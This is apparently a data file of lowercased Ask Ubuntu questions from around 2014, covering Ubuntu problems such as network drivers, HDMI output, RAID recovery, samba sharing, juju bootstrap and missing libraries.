( 38.8 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:191 errors:0 dropped:0 overruns:0 frame:0 tx packets:191 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:13717 ( 13.7 kb ) tx bytes:13717 ( 13.7 kb ) wlan0 link encap : ethernet hwaddr 54:35:30:80 : eb:01 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) i figured it out . thanks everyone for your help . it was a combination of two problems : http : //superuser.com/questions/756145/ubuntu-14-04-wired-connection-detected-but-no-internet-access that worked after i did some other stuff to allow the changes to be saved , and then i went to the settings and used the proprietary drivers as suggested below , although it did n't work the first time . i had to reinstall in order to achieve success .
488142	hdmi output stopped working 12.04 precise	seen this question quite a bit , but not none answered my problem . suddenly - one day - hdmi stops working . when i connect to my philips monitor , i get `` no video input '' - and then it enters sleep mode . when i disonnect it , the monitor notices i 've disconnected a cable . my output on xrandr : screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 8192 x 8192 lvds1 connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 293mm x 165mm 1366x768 60.0*+ 40.0 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) so it does n't even show the hdmi ! the only similiar thing i see is this but no one answered this problem with something that i can do ...
488143	cant install downloaded game	i use ubuntu like 1 hour ago , and i cant install league of legends , some ideas ? when i try to install it in give me error and it said that the fail is invalid , or something like that , i cant do anything..
488144	uninstall ubuntu 14.04 without recovery disk/usb - help needed urgently !	i am dual booting windows 8 & ubuntu and i want to safely uninstall ubuntu from windows 8 . 2 questions 1 ) how do i safely uninstall ubuntu from windows 8 without a recovery disk/usb ? : can i not just click f9 upon boot and enter : bcdboot c : /windows ; bootrec /fixmbr ; bootrec /fixboot after deleting the ubuntu partitions ? 2 ) is the following link a valid method to uninstall ubuntu from windows 8 : http : //www.makeuseof.com/tag/how-to-safely-uninstall-ubuntu-in-windows-dual-boot-environment/ note : this is not a duplicate of another question . i need to know if i can uninstall ubuntu safely from windows without a recovery disk/usb .
488145	how do i regain access to command line/terminal and restore ubuntu	i have a newish lenovo ideapad 510p with nvidia graphics and i recently wanted to upgrade from 12.04 to the brand new 14.04 . ubuntu 's website seemed to detail that the best way to do this was to upgrade to every release all the way through 14.04 ( thought that was super lame ) . i began by updating to 12.10 . everything went great until i restarted to finish installation . i received the classic purple splash but nothing beyond . going into recovery and changing 'no splash ' to 'nomodeset ' allowed me to get to command line but i could still not see my desktop . then i read that it may be because of nvidia and that i needed to update the drivers . i performed 'sudo apt-get nvidia-update ' or a command along those lines ( so much troubleshooting i 've forgotten exactly ) . and it appeared to update everything successfully . now when i try to boot ubuntu 12.10 i eventually receive : mountall : disconnected from plymouth all the troubleshooting seems to direct me to run additional commands but i can not even seem to get that to load anymore . i can not login , everything i try either ends in a loading ubuntu purple screen , a flicker and a complete black screen , or mountall : disconnected from plymouth . the only command line/terminal i seem to be able to access is grub . please help me and thank you in advance !
488147	raid 0 recovery from lacie nas	i am in desperate need of some assistance by the more experienced users out there ! i am trying to rebuild a raid0 that is composed of two 2tb hard drives . these come out of a lacie ethernet bigdisk nas . no there is no backup.. : ( ( this is not by my fault , i am trying my best to help someone out here ) i have the drives in a computer with a usb drive that i have installed ubuntu on . this is the output of sudo lsblk -o name , fstype , size , label , uuid name fstype size label uuid sda 1.8t ├─sda1 1k ├─sda2 linux_raid_member 1.8t 0b33c96c-3267-4dda-9c33-f0e6a8abe951 ├─sda5 linux_raid_member 125.5m a112f3a4-472c-8008-3172-2866dd435985 ├─sda6 7.8m ├─sda7 linux_raid_member 7.8m 70135df2-a985-f5b7-d3d0-1e2c16f3e331 │ └─md0 ext3 7.8m 0cbefed4-b28a-4270-89b4-c8b0c2246a0e ├─sda8 linux_raid_member 172.6m c23d224f-4f83-432d-e498-c8628ef39fff │ └─md1 ext3 172.4m 4bb82d3c-b540-4704-a503-658e0d97ffdd ├─sda9 linux_raid_member 658.9m 91d5a0a3-fd3d-4c6a-2cc7-32845ef359bb │ └─md2 ext3 658.8m 99563061-f408-495f-ba94-152786e93182 └─sda10 7.8m sdb 1.8t ├─sdb1 1k ├─sdb2 linux_raid_member 1.8t 36e6f8e3-15ec-662b-c148-5bb2a5bceeda │ └─md4 xfs 1.8t cc32535f-2ece-4fe3-8b64-0b09ad62acee ├─sdb5 linux_raid_member 125.5m a112f3a4-472c-8008-3172-2866dd435985 ├─sdb6 7.8m ├─sdb7 linux_raid_member 7.8m 70135df2-a985-f5b7-d3d0-1e2c16f3e331 │ └─md0 ext3 7.8m 0cbefed4-b28a-4270-89b4-c8b0c2246a0e ├─sdb8 linux_raid_member 172.6m c23d224f-4f83-432d-e498-c8628ef39fff │ └─md1 ext3 172.4m 4bb82d3c-b540-4704-a503-658e0d97ffdd ├─sdb9 linux_raid_member 658.9m 91d5a0a3-fd3d-4c6a-2cc7-32845ef359bb │ └─md2 ext3 658.8m 99563061-f408-495f-ba94-152786e93182 └─sdb10 7.8m sdc vfat 29.4g uui 2a36-18ba sdh 931.5g └─sdh1 ext4 931.5g b0758db3-d837-40c0-b1b3-c35b75547492 loop0 squashfs 922m loop1 ext2 4g casper-rw 83b54757-51c1-8b47-95b3-4db0cb2f2eaf /dev/sdh can be ignored , this is an additional drive that i have mounted to eventually back up data on . /dev/sda and /dev/sdb are the drives in question . i know from a previous rebuild of a raid1 out of an identical nas that sda2 and sdb2 are the two components of the data partition that i am trying to rebuild . as you can see , the uuid do not match . the output of mdadm -- detail /dev/md4 is mdadm : only specify uuid once , uuid=0b33c96c-3267-4dda-9c33-f0e6a8abe951 ignored . /dev/md4 : version : 0.90 creation time : wed jun 25 13:10:52 2014 raid level : raid0 array size : 1952507904 ( 1862.06 gib 1999.37 gb ) raid devices : 1 total devices : 1 preferred minor : 4 persistence : superblock is persistent update time : wed jun 25 15:40:00 2014 state : clean active devices : 1 working devices : 1 failed devices : 0 spare devices : 0 chunk size : 64k uuid : 36e6f8e3:15ec662b : c1485bb2 : a5bceeda events : 0.9 number major minor raiddevice state 0 8 18 0 active sync /dev/sdb2 this is the content of /etc/mdadm/mdadm.conf gnu nano 2.2.6 file : /etc/mdadm/mdadm.conf modified # mdadm.conf # # please refer to mdadm.conf ( 5 ) for information about this file . # # by default ( built-in ) , scan all partitions ( /proc/partitions ) and all # containers for md superblocks . alternatively , specify devices to scan , using # wildcards if desired . # device partitions containers # auto-create devices with debian standard permissions create owner=root group=disk mode=0660 auto=yes # automatically tag new arrays as belonging to the local system homehost < system > # instruct the monitoring daemon where to send mail alerts mailaddr root # definitions of existing md arrays array /dev/md4 uuid=36e6f8e3:15ec662b : c1485bb2 : a5bceeda array /dev/md4 uuid=0b33c96c:32674dda:9c33f0e6 : a8abe951 array /dev/md3 uuid=a112f3a4:472c8008:31722866 : dd435985 array /dev/md0 uuid=70135df2 : a985f5b7 : d3d01e2c:16f3e331 array /dev/md1 uuid=c23d224f:4f83432d : e498c862:8ef39fff array /dev/md2 uuid=91d5a0a3 : fd3d4c6a:2cc73284:5ef359bb array /dev/md4 uuid=cc840009:3a69e8c7 : a32dd14d : b8a687e6 array /dev/md3 uuid=8c501802:6c7b647c:476b988d:97fa7b70 array /dev/md0 uuid=825b1375:1b6fb25d : f9cb5b23 : cecd9dda array /dev/md1 uuid=bf54ebc8:05c31b36:0b1f9043 : b7b95984 array /dev/md2 uuid=659b7134 : d42d6430:67b65ea6 : d36494b1 # this file was auto-generated on wed , 25 jun 2014 17:07:46 +0000 # by mkconf $ id $ this was created automatically upon installing mdadm . i can not make any sense of it and would appreciate any suggestions that might help me out here . thanks a bunch in advance ! i could not even imagine having the possibility to rebuild this thing without the work you guys do . thank you !
488148	how to update the software database ?	i have setup two disks on my computer , ubuntu , / and /home . later i found the disk space on / is not big enough ( just 20g ) , so i installed my texlive to my own disk , somewhere under $ home . now i want to install emacs ' auctex using synaptic package manager , but it says the prerequisite is to install the texlive . i want to know is there a way to tell the synaptic package manager , that texlive has been installed ?
488150	isc-dhcp-server ca n't start	i installed dhcp3-server , now i want to start its service and it said : [ fail ] starting isc dhcp server : dhcpd [ ... . ] check syslog for diagnostics . ... failed ! failed ! i check ps aux | grep dhcp shows : root 6178 0.0 0.0 9956 3708 ? s 23:06 0:00 /sbin/dhclient -d -4 -sf /usr/lib/networkmanager/nm-dhcp-client.action -pf /var/run/dhclient-wlan0.pid -lf /var/lib/dhcp/dhclient-eee3fc61-32c1-4aa7-b189-94556369eac2-wlan0.lease -cf /var/run/nm-dhclient-wlan0.conf wlan0 root 6418 0.0 0.0 7764 860 pts/0 r+ 23:13 0:00 grep dhcp dhcpd.conft is like default , before that i tried to implement a dhcp server on my at0 but i could n't . if need a details just said . `i tried to remove it but : [ fail ] stopping isc dhcp server : dhcpd failed ! i don know what can i do now ? ! how can i fix it ? or delete it ?
488153	dead asus laptop - can i boot windows from within ubuntu terminal ?	i have an asus laptop ( model u56e , windows 7 64-bit ) that is baffling me right now . i was recently on a trip , laptop working fine , though partitioned sata hdd a bit overloaded with vacay pics . on way home , closed my laptop , put it in bag & did n't open it again for 2 days . when i did it was dead - post audio , but stuck on asus splash screen . what i have done so far : removed hdd booted into ubuntu using dvd connected hdd with sata/usb cable & backed up important files . it would not mount os partition , just data partition . gave me `` windows is hibernated , refused to mount '' error . successfully mounted os partition using remove_hiberfile command . reinstalled hdd . still stuck on splash screen . removed/reset cmos battery . no change . confirmed i have latest bios . reset bios defaults . no change . current status : *hdd appears healthy . spins up , no strange noises , able to access/transfer files , etc . *only able to enter bios with hdd removed . as soon as i reinstall hdd , can no longer enter bios . *unable to see if hdd is recognized in bios or not & obviously unable to change boot order . bios does recognize usb if i plug in flash drive . i 'm at a loss for what to do next . my questions are : if the connector for the hdd is bad , would n't the bios just not recognize the drive & move on to boot from dvd ? is there a way to boot into the windows os from within the ubuntu terminal so that i may do a proper complete shutdown now that hiberfil.sys is gone ? ( i can not find my original windows 7 cd ) sorry for any ignorance . just have reached the end of my limited knowledge . thanks in advance for any ideas !
488154	how do i turn off delete confirmation in lubuntu ( lxde )	i would like to make it so that files get deleted instantly when i press delete key in file manager ( pcmanfm ) in lubuntu ( lxde ) . how do i change this setting ? a command-line solution is preferred , so that i could automate it upon installation . i 'm using lxde installed on on ubuntu 13.10 32-bit .
488158	forced using ppa 's which only supports newer oses	i have a problem : i 'm added a ppa , which currently states 13.10 ( removing soon ) and 14.04 support . i would like to try force install a package from this ppa on my old 12.04 lts without my os version check . how i could to do it ?
488159	ca n't open skype or steam ( error with libxcb-dri3.so.0 and libxshmfence.so.1 )	so i recently could n't load up my desktop and after i fixed that by reinstalling unity i cant load up skype or steam anymore ! when i try opening skype from terminal i get the following error : 'skype : error while loading shared libraries : libxcb-dri3.so.0 : can not open shared object file : no such file or directory' and for steam ' running steam on ubuntu 14.04 64-bit steam_runtime is enabled automatically error : you are missing the following 32-bit libraries , and steam may not run : libxshmfence.so.1 installing breakpad exception handler for appid ( steam ) /version ( 1401381906_client ) installing breakpad exception handler for appid ( steam ) /version ( 1401381906_client ) ' i 've tried updating video drivers but it did n't work .
488162	synclient : monitor changes to the touchpad state with 1.7.1	i 'm attempting to resolve some issues with my touchpad by getting the debugging output via this tutorial . one of the steps in the tutorial advises me to monitor the touchpad activity with the following command : synclient -m 100 the problem is that the -m flag ( denoting interval ) was removed in the current version of synclient , as described in this askubuntu post . in summary , the solution suggested to downgrade synclient to its earlier version ( 1.6 ) which , while a decent stopgap measure , is n't really a solution for the long haul . my question is : how do i achieve the same effect in the synclient 1.7 without the -m flag ? i have to imagine that this is a rather fundamental function of the package and so it has to be in there somewhere .
488163	grub rescue : no such partition	seems like i lost my boot loader while running a windows 7 recovery . i had got my windows 7 crashed several months ago , and today i ran a recovery , which showed something like `` error:366. try restarting your computer '' and since then , i 'm getting a grub rescue page . i am using trusty tahr , and i have an installation disk with me .
488165	using internal and external radeon gpu 's for multi-monitor	i currently have a two monitor setup that works perfectly fine for windows . however , in past experiences with ubuntu , i 've been forced to use only my internal gpu ( when both are bios enabled ) in ubuntu . basically i want to know if i can have this setup the same way i do in windows ( its treated like one extended desktop ) . i really miss using ubuntu actually . my setup is as follows.. external : radeon hd 7570 2gb of ram . internal : radeon hd 7560d current os is windows 8.1 , i remember this working in windows 7 too . the reason for doing this is that my 7570 only has dvi , hdmi , and displayport ports . no vga . my two monitors are vga monitors so i wound up adapting one via the dvi and another in my motherboard 's vga port . i currently do n't have ubuntu installed ( i did in the past like i said before ) but if i ca n't get this working the same way i do in windows then i 'll just end up virtualboxing it again . thanks in advanced , mike
488170	maas / juju bootstrap - node installation via pxe loops at partitioner step	i am trying to setup a maas / juju / openstack environment . currently i 've installed juju on the maas server and am trying to run the juju bootstrap command . in the terminal i can see ( using -v ) it 's trying to connect to 1 of my nodes ( which despite having ipmi configured correct , i have to power-on myself ) . then it will start the ubuntu installation via pxe on the chosen node , going through all the installation steps automatically and will eventually reach the `` starting up the partitioner '' step doing nothing but repeating that step over and over again . eventually after about 10 minutes my juju bootstrap command tells me it takes too long and destroys the envirment causing the node to power-off without installing anything . this is the putty ssh from the maas server ( which also contains the juju installation ) : root @ masternode : /home/user # juju bootstrap launching instance warning picked arbitrary tools & { `` 1.18.4-trusty-amd64 '' `` https : //streams.canonical.com/juju/tools/releases/juju-1.18244874ffec4af083cdeb58040420320f63ac6a3f7526c81d963fa4e53d6 '' % ! q ( int64=7389403 ) } - /maas/api/1.0/nodes/node-21ff183c-fc94-11e3-ba73-0013723f9f8b/ waiting for address === this is where the problem described above starts === attempting to connect to 7mb4j.local:22 error bootstrap failed : waited for 10m0s without being able to connect : ssh : could not resolve hostname 7mb4j.local stopping instance ... bootstrap failed , destroying environment error waited for 10m0s without being able to connect : ssh : could not resolve hostname 7mb4j.local : name or service what am i doing wrong here ? i 'm using ubuntu 14.04 lts with 7 dell poweredge sc1425 servers ( 1 maas server + 6 nodes ) . thanks in advance .
488171	name of the file from /proc that is used to pass information from boot-loader to kernel	i am revising for lpi exam , and i can not know this information which is : the name of the file resides in /proc that is used to pass information from boot-loader to kernel ?
488173	gnome tweak tool is unable to disable caps lock	i just installed this because xmodmap keeps resetting and i need to use caps lock as backspace but selecting this option in gnome-tweak-tool gives me normal caps lock behaviour and caps lock behaviour . selecting `` caps lock is disabled '' does nothing . i have the minimak layout installed by evdev modification but i hope this is n't the problem ?
488176	will ubuntu touch be available on blackberry devices ?	will blackberry devices be supported by ubuntu touch in the future ? i would like to install it on my q5
488179	`` connect to server '' option changed in 14.04 ? ? ca n't connect using webdav	i am on ubuntu 14.04 . i would like to connect to my android phone using webdav . i 've done this from a mac , from windows , and from kubuntu ( using dolphin -- this also works in ubuntu using dolphin ) with no problem . but when i select `` connect to server '' i get this dialog box : new dialog but it used to look like this old dialog is there any way to get the old dialog back ? i would like to follow the tutorial under davdrive here ( www.upubuntu.com/2012/01/some-free-apps-for-managing-your.html ) ( as it is intuitive and how kubuntu worked ) , but i ca n't do it with the current dialog . is there any way to directly connect to a webdav client inside nautilus by typing webdav : //10.0.1.15:8888/ into the location bar ( ctrl-l ) ? i get an error message every time : `` sorry , could not display all the contents of â10.0.1.15 ( webdav ) â : the specified location is not supported . '' this too works in dolphin .
488181	ldconfig finds a library , ldd still does n't	edit : found the answer -- the binary is 32bit , i was installing 64bit libraries . installing like sudo apt-get install libsdl1.2debian : i386 works . i 'm trying to get dwarf fortress to work under ubuntu 14.04 . it comes as a dynamically linked binary with some dependencies that i do n't have yet . so i run ldd on it : $ ldd libs/dwarf_fortress linux-gate.so.1 = > ( 0xf76e3000 ) libsdl-1.2.so.0 = > not found libgraphics.so = > /home/remco/src/df_linux/libs/libgraphics.so ( 0xf72af000 ) libstdc++.so.6 = > /home/remco/src/df_linux/libs/libstdc++.so.6 ( 0xf71d1000 ) libm.so.6 = > /lib/i386-linux-gnu/libm.so.6 ( 0xf718b000 ) libgcc_s.so.1 = > /home/remco/src/df_linux/libs/libgcc_s.so.1 ( 0xf7170000 ) libc.so.6 = > /lib/i386-linux-gnu/libc.so.6 ( 0xf6fc1000 ) libpthread.so.0 = > /lib/i386-linux-gnu/libpthread.so.0 ( 0xf6fa5000 ) /lib/ld-linux.so.2 ( 0xf76e4000 ) libgtk-x11-2.0.so.0 = > not found libgobject-2.0.so.0 = > not found libsdl-1.2.so.0 = > not found libsdl_image-1.2.so.0 = > not found libglu.so.1 = > not found libsdl_ttf-2.0.so.0 = > not found let 's go for the first . apt-file search tells me that libsdl-1.2.so.0 is provided by 'libsdl1.2debian ' , so i install that . sure enough : $ ls -l /usr/lib/x86_64-linux-gnu/libsdl* lrwxrwxrwx 1 root root 20 mei 10 06:40 /usr/lib/x86_64-linux-gnu/libsdl-1.2.so.0 - > libsdl-1.2.so.0.11.4 -rw-r -- r -- 1 root root 427600 mei 10 06:40 /usr/lib/x86_64-linux-gnu/libsdl-1.2.so.0.11.4 and this directory is mentioned in /etc/ld.so.conf.d/x86_64-linux-gnu.conf . ldconfig works too , at least , apart from somee warning messages ( sorry for the dutch ) : $ sudo ldconfig -v | grep libsdl /sbin/ldconfig.real : kan status van /lib/i686-linux-gnu niet opvragen : bestand of map bestaat niet /sbin/ldconfig.real : kan status van /usr/lib/i686-linux-gnu niet opvragen : bestand of map bestaat niet /sbin/ldconfig.real : pad '/lib/x86_64-linux-gnu ' is meerdere malen opgegeven /sbin/ldconfig.real : pad '/usr/lib/x86_64-linux-gnu ' is meerdere malen opgegeven /sbin/ldconfig.real : /lib/i386-linux-gnu/ld-2.19.so is the dynamic linker , ignoring /sbin/ldconfig.real : /lib/x86_64-linux-gnu/ld-2.19.so is the dynamic linker , ignoring libsdl-1.2.so.0 - > libsdl-1.2.so.0.11.4 the `` meerdere malen opgegeven '' errors mean that the path occurs multiple times in /etc/ld.so.conf.d/ , seems ok to me . the last line tells me that the right file has been found . unfortunately , ldd still gives the exact same output as above . is there a step i 'm missing ? do i need to reload something ? as far as i can see , ldconfig works correctly , but ldd still does n't find the file , and i thought it would .
488182	how create symbolik link /dev/usb/lp* and permission change to raw print ? xubuntu 14.04	i want use a symbolic link from usb printers but i ca n't write to this device : $ ls -l /dev/usb/lp* crw-rw -- -- 1 root lp 180 , 0 jun 25 14:17 /dev/usb/lp0 crw-rw -- -- 1 root lp 180 , 1 jun 25 14:17 /dev/usb/lp1 crw-rw -- -- 1 root lp 180 , 2 jun 25 14:17 /dev/usb/lp2 how i can change this permission ? to 666 ? and i create the symbolic link in : sudo gedit /lib/udev/rules.d/70-printers.rules this is a content : # low-level usb device add trigger action== '' add '' , subsystem== '' usb '' , attr { binterfaceclass } == '' 07 '' , attr { binterfacesubclass } == '' 01 '' , tag+= '' udev-configure-printer '' , run+= '' udev-configure-printer add % p '' # low-level usb device remove trigger action== '' remove '' , subsystem== '' usb '' , env { id_usb_interfaces } == '' *:0701* : * '' , run+= '' udev-configure-printer remove % p '' # printer1 subsystem== '' usb '' , attrs { serial } == '' 3ul8tbcqul2hmhoy12vf '' , symlink+= '' caliente '' # printer2 subsystem== '' usb '' , attrs { serial } == '' jghe24ikku7plwr8x3c6 '' , symlink+= '' bar '' # printer3 subsystem== '' usb '' , attrs { serial } == '' xvc0eqqd3nzzq6ziv8ss '' , symlink+= '' fria '' the symbolics links are created : ls -l /dev/bar lrwxrwxrwx 1 root root 15 jun 25 14:12 /dev/bar - > bus/usb/003/002 but when i try print in command line i get this : echo `` hi '' > > /dev/bar bash : /dev/bar : permission denied i hope can help me ! ! !
488183	winload.exe is missing ( corrupt ? ) after installing ubuntu as dual boot	i just installed ubuntu as dual boot with my win8.1 pro installation . both operating systems are installed on the same drive . ubuntu runs fine ( though i ca n't access any hard drives that windows used , some mounting error with ntfs or whatever ) and i can do whatever i like in that , but when i try to boot windows , i get an error that windows/system32/winload.exe is missing . i ca n't verify this because i ca n't access that directory from ubuntu.. i have had this error once before before installing ubuntu , and then unplugging all drives except the windows disk worked fine . this is not the case now . any suggestions on how to fix this are greatly appreciated !
488185	vmware player ram memory problem	i 've installed windows 7 on ubuntu using vmware player . i have a 6 gb ram memory , so the amount of memory i 've allocated for this virtual machine is 2520 mb . but when i look in the `` system monitor '' on resources , the amount of memory occupied is only 1,5 gb . theoretically there should be 1,5 gb ( for the kernel and background processes ) + 2520 mb ( for the virtual machine ) . i 've also noticed that my hard-disk is overloaded . where is the problem ? i use ubuntu 14.04 lts 64bit .
488187	`` pkg-config -- modversion glib-2.0 '' reports older version	i have ubuntu 14.04 32 bit . i am trying to compile an application from source code . it gives me an error message during linking in make process though ./autogen.sh and ./configure passed without errors . i got this error undefined reference to g_variant_parse_error_quark i read that that function g_variant_parse_error_quark added to glib2 in 2.39 . i checked out installed packages and found that libglib version is 2.40.0 in my system . however pkg-config -- modversion glib-2.0 reports 2.38.2 it appears that i have at least two different glib2 installed . i might have manually installed glib2 from source in the past . how can i fix that problem and let my system use correct latest library ?
488191	how to get network to `` see '' 14.04 desktop ?	i 'm also having problems with a new install of 14.04 desktop . i 'm a novice to ubuntu . i have another pc running 14.04 studio and it works fine with my windows network . i did the following : [ quote= '' ronnbot , post:8 , topic:1301 '' ] started fresh by removing samba : sudo apt-get autoremove samba samba-common sudo apt-get autoremove system-config-samba reinstall samba : sudo apt-get install samba samba-common sudo apt-get install system-config-samba cifs-utils i copied smb.conf.default ( thanks caribooâ907 for the link ) into /etc/samba/smb.conf i could not save the smb.conf file as i get a red banner stating that i do n't have permission to change a read only file . in both the /usr/share/samba , and /etc/samba then i launched the samba app to set my samba user but this will not work in unity dash ( it does not show the application `` samba '' and the samba configuration tool does not open ) . i also could not get all the files . i read in another forum that you could do the following : first , check your machine is fully updated . open command line ( ctrl + alt + f1 ) : or in my case ( ctrl + alt +t ) sudo apt-get update sudo apt-get dist-upgrade if you get any errors , run : sudo apt-get install -f then rerun to first two commands to ensure no further errors . after that you can try logging in ( ctrl-alt-f7 to change to you gui ) to see if unity is now working . if unity is still not running , follow these instructions to reset your unity configuration , ( from how do i reset my unity configuration ? ) : with 14.04 install unity-tweak-tool : sudo apt-get install unity-tweak-tool then run the follow command to reset unity to defaults : unity-tweak-tool -- reset-unity ( in my case unity started working after 14 files either updated or were added . the samba server configuration gui started working and i can add shares . i can `` see '' the network from the ubuntu-desktop pc but the pc is not named and a `` smb-server '' is listed . i can see and log into shares for the win7 , win8 and the other ubuntu-studio pcs . i ca n't `` see '' the ubuntu-desktop pc from anywhere on the network ! ) my configuration files reside only in ( no /var/lib/samba ) , the shares , located in /var/lib/samba/usershares , and look similar to this : version 2 path=/home/desktop/vaio comment= usershare_acl=s-1-1-0 : f guest_ok=y ( mine had an n which i changed to a y ) sharename=public any ideas what i 'm doing wrong ? revision to original post : after changing different parts of the os for about a week and continuously getting internal error messages , i decided to wipe out the os install and start over . i reloaded everything again and added samba but could not get unity dash and the gui with the samba server configuration to work again even though samba showed to be installed . i surfed and finally ran across an article : fix for ubuntu 14.04 .. make sure samba is not installed . then open terminal & type `` sudo apt-get install gksu '' ( without the quotes ) . then type gksu-properties in the dialogue that follows set authentication mode to `` sudo '' and grab mode to `` enable '' now install samba everything should be working & it show up on unity bar & search . basically its the same steps trevor lane ray did for 13.04 this is how i solved the issue 1. open terminal in this stage i remove any samba related app 's i had installed 2.1. in terminal - > sudo apt-get autoremove samba samba-common 2.2. in terminal- > sudo apt-get autoremove system-config-samba ubuntu 13.04 doesnt have gksu installed by default so i installed and configuerd it 3.1. in terminal- > sudo apt-get install gksu 3.2. in terminal- > gksu-properties in the dialogue that follows set authentication mode to `` sudo '' and grab mode to `` enable '' . install samba 4.1. in terminal- > sudo apt-get install samba samba-common when installing in the prompt for `` smb.conf '' that i got i chose to overwrite the smb.conf file . 4.2. in terminal- > sudo apt-get install samba system-config-samba cifs-utils after this the samba icon showed in the dock and everything works fine . setting samba user password to add yourself to the samba user list , you just have to type the following command : sudo smbpasswd -a replace with your username . it will then prompt you to set a password for this samba account . alternatively , you can also create a new user account and add this user to the samba user list to create a user account , use the following command : sudo adduser restart samba services sudo restart smbd sudo restart nmbd everything started working after that ! ! !
488192	ubuntu mount points to enable a btsync share - consistent mount point	my additional hdd 's mount to location media/username/partitionname using the btsync software to create a folder sync , i am trying to point to a mountpoint and folder location . btsync only seems to let me navigate the folder tree up to the point media/username and no further . i figure its because the mount point is not static . how do i point to a mount point consistently so that this could work with btsync ? and would these mounts need to always be mounted ?
488196	minecraft launcher does not start	i need to know how to play minecraft on ubuntu . when i download minecraft and try to start it , the minecraft launcher does not start .
488200	installing linux-headers-2.6.32-042stab085.20	i am trying to install virtualbox-4.3 on a vps hosting which has ubuntu 12.04 and kernel version : uname -r == > 2.6.32-042stab085.20 when i try to install it , i get the following error : trying to register the virtualbox kernel modules using dkmserror ! your kernel headers for kernel 2.6.32-042stab085.20 can not be found . please install the linux-headers-2.6.32-042stab085.20 package , i know that the kernel is old and i really ca n't update it , unfortunately , since i do n't have the rights for that ... is there a way to install the headers for this kernel version ? edit1 : i have found the following in /lib/modules/ $ ( uname -r ) /lib/modules $ cd /lib/modules/ $ ( uname -r ) /lib/modules/2.6.32-042stab085.20 $ ls modules.alias modules.ccwmap modules.dep.bin modules.ieee1394map modules.isapnpmap modules.pcimap modules.softdep modules.symbols.bin modules.alias.bin modules.dep modules.devname modules.inputmap modules.ofmap modules.seriomap modules.symbols modules.usbmap it is strange though , since there is no include folder ...
488202	volume buttons not working ubuntu 14.04	every time i hit my hotkeys for sound ( and i rechecked the system settings , they are properly assigned ) , i do n't get any action from them . matter of fact , even when i manually go to mute my audio system , it does n't mute . no display , no upshift down or up , nothing . i have reset the key functions , so i do n't think that 's the problem . however , i did try to set up my audio output so that it would comply with hdmi a couple of days ago . thinking this might be a part of the problem and lo and behold , the outputs and inputs are gone in my system settings gui . what should i do to correct this problem ? i am running ubuntu 14.04 , soundcard is nvidia 1.2.20 and intel display audio . my graphics card is nvidia geforce gtx 670m , and i am running this all on a toshiba qosmio x875 .
488203	recent ubuntu update has killed my rutorrent/rtorrent link	i just installed the latest updates to ubuntu 14.04 . everything seems to be working properly . rtorrent is working . nginx is running php5-fpm is running and yet when i try to connect to rtorrent with rutorrent , rutorrent comes up but doesnt connect to rtorrent . i did notice one thing - for some reason my ip address has changed . it was 192.168.0.34 and now it 's 192.168.0.36 but the connection is working fine and rtorrent is uploading and downloading fine . i 'm finding it hard to diagnose because all of the individual parts seem to be working but the whole is not . would really appreciate some help with trying to diagnose the problem and fixing it . here are the errors i get [ 26.06.2014 00:13:59 ] bad response from server : ( 502 [ error , getplugins ] ) < html > < head > < title > 502 bad gateway < /title > < /head > < body bgcolor= '' white '' > < center > < h1 > 502 bad gateway < /h1 > < /center > < hr > < center > nginx/1.6.0 < /center > < /body > < /html > [ 26.06.2014 00:13:59 ] bad response from server : ( 502 [ error , getuisettings ] ) < html > < head > < title > 502 bad gateway < /title > < /head > < body bgcolor= '' white '' > < center > < h1 > 502 bad gateway < /h1 > < /center > < hr > < center > nginx/1.6.0 < /center > < /body > < /html >
488208	external montor on samsung n150 plus will only run on 1024 x 600 resolution	my samsung n150 plus runs ok on ubuntu 14 which i have just installed as dual boot with win 7 . however when i connect my asus ml239h monitor i can only get 1024 x 600 resolution . with win 7 the monitor will run at 1680 x 1050 which is perfect . 1024 x 600 is poor substitute ! how can i change to 1680 x 1050 ? i am new to ubuntu - and gave up doing command line instructions with dos 6.02 ! ubuntu should do better than this - there must be many with the same problem .
488209	juju mongodb charm not found	on an ubuntu 14.04 ( trusty ) host , this command fails : juju deploy mongodb error charm not found : cs : trusty/mongodb i am attempting to follow this documentation : https : //juju.ubuntu.com/docs/howto-node.html what does it mean ?
488212	how to set up a sparkleshare host on ubuntu	i installed sparkleshare from the software centre , it is sitting in my launcher but it will not launch . i understand that i must set up a host but when i try to install/run the setup script nothing seems to happen : root @ my-computer : ~ # curl https : //raw.github.com/hbons/dazzle/master/dazzle.sh \ -- output /usr/bin/dazzle & & chmod +x /usr/bin/dazzle % total % received % xferd average speed time time time current dload upload total spent left speed 0 0 0 0 0 0 0 0 -- : -- : -- -- : -- : -- -- : -- : -- 0 root @ my-computer : ~ # i tried downloading the script from the github repository and putting it in /usr/bin/dazzle by hand , but i still get : root @ my-computer : ~ # dazzle setup dazzle : command not found i 'm new to the world of shell scripts . what should i try next ?
488213	how to add a second hard drive to an already installed xubuntu 14.04 ?	i want to know how to install a second hard drive in xubuntu 14.04 . taking in mind that i already installed xubuntu in another hard drive . i just want to add more storage to it . also the other hard drive has windows xp installed in it and i just want to delete it off . i want to add all the extra storage to the existing hard drive that has xubuntu . # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda1 during installation uuid=f0212a60-ad55-43d9-9418-8b9d6bea832d / ext4 errors=remount-ro # swap was on /dev/sda5 during installation uuid=8bdc6e45-c488-4400-9a1c-aa1dc2722a39 none swap sw uuid=1579e689-3965-47db-83a7-665cceeb6aff /media/bigdata ext4 defaults i followed dan08 steps , the drive is mounted in bigdata everything is fine the only thing is that i ca n't move anything to it like files . is like i need a permission or something in order to paste or move a file to it . this is what i get when i try to move a file to it . error opening file '/media/bigdata/uninstalling wine.odt ' . permission denied . how do i use chown to change my permissions in my new drive , so i can copy and paste on it ? **when i go to the new partition drive and i open the terminal in that location and i type ls -l this 